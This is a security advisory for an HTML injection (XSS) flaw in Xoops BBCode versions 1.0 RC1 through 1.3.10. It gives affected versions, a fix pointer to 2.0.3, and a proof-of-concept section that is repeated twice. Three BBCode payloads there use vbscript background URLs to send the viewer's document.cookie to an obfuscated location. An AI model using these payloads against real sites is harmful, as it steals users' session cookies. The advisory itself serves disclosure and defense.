Xoops BBCode HTML Injection Vulnerability
BID:8414
Info
Xoops BBCode HTML Injection Vulnerability
| Bugtraq ID: | 8414 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 13 2003 12:00AM |
| Updated: | Aug 13 2003 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to "Frog Man" <[email protected]>. |
| Vulnerable: |
Xoops Xoops 1.3.10 Xoops Xoops 1.3.9 Xoops Xoops 1.3.8 Xoops Xoops 1.3.7 Xoops Xoops 1.3.6 Xoops Xoops 1.3.5 Xoops Xoops 1.0 RC1 Xoops Xoops 1.0 RC3.0.5 Xoops Xoops 1.0 RC3 |
| Not Vulnerable: |
Xoops Xoops 2.0.3 Xoops Xoops 2.0.2 Xoops Xoops 2.0.1 Xoops Xoops 2.0 |
Discussion
Xoops BBCode HTML Injection Vulnerability
Xoops BBCode has been reported prone to an HTML injection vulnerability. It has been reported that an attacker may inject malicious script into areas of Xoops where BBCode is rendered. This issue is due to a lack of sufficient sanitization performed on user supplied BBCode tags. Injected code may be rendered in the web browser of a user who views vulnerable areas of the site. This would occur in the security context of the site hosting Xoops and its related modules.
Xoops BBCode has been reported prone to an HTML injection vulnerability. It has been reported that an attacker may inject malicious script into areas of Xoops where BBCode is rendered. This issue is due to a lack of sufficient sanitization performed on user supplied BBCode tags. Injected code may be rendered in the web browser of a user who views vulnerable areas of the site. This would occur in the security context of the site hosting Xoops and its related modules.
Exploit / POC
Xoops BBCode HTML Injection Vulnerability
The following proof of concept has been supplied:
[color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color]
[size=10;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/size]
[font=Verdana;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font]
The following proof of concept has been supplied:
[color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color]
[size=10;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/size]
[font=Verdana;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font]
Solution / Fix
Xoops BBCode HTML Injection Vulnerability
Solution:
This issue has been reported to be resolved in the latest version of Xoops.
Xoops Xoops 1.0 RC3
Xoops Xoops 1.0 RC1
Xoops Xoops 1.0 RC3.0.5
Xoops Xoops 1.3.10
Xoops Xoops 1.3.5
Xoops Xoops 1.3.6
Xoops Xoops 1.3.7
Xoops Xoops 1.3.8
Xoops Xoops 1.3.9
Solution:
This issue has been reported to be resolved in the latest version of Xoops.
Xoops Xoops 1.0 RC3
-
Xoops XOOPS 2.0.3
http://www.xoops.org//general/download.php
Xoops Xoops 1.0 RC1
-
Xoops XOOPS 2.0.3
http://www.xoops.org//general/download.php
Xoops Xoops 1.0 RC3.0.5
-
Xoops XOOPS 2.0.3
http://www.xoops.org//general/download.php
Xoops Xoops 1.3.10
-
Xoops XOOPS 2.0.3
http://www.xoops.org//general/download.php
Xoops Xoops 1.3.5
-
Xoops XOOPS 2.0.3
http://www.xoops.org//general/download.php
Xoops Xoops 1.3.6
-
Xoops XOOPS 2.0.3
http://www.xoops.org//general/download.php
Xoops Xoops 1.3.7
-
Xoops XOOPS 2.0.3
http://www.xoops.org//general/download.php
Xoops Xoops 1.3.8
-
Xoops XOOPS 2.0.3
http://www.xoops.org//general/download.php
Xoops Xoops 1.3.9
-
Xoops XOOPS 2.0.3
http://www.xoops.org//general/download.php
References
Xoops BBCode HTML Injection Vulnerability
References:
References:
- ProManager Homepage (Promanager)
- BBCode XSS in XOOPS CMS ("Frog Man"
) - Re: BBCode XSS in XOOPS CMS ("kain"
)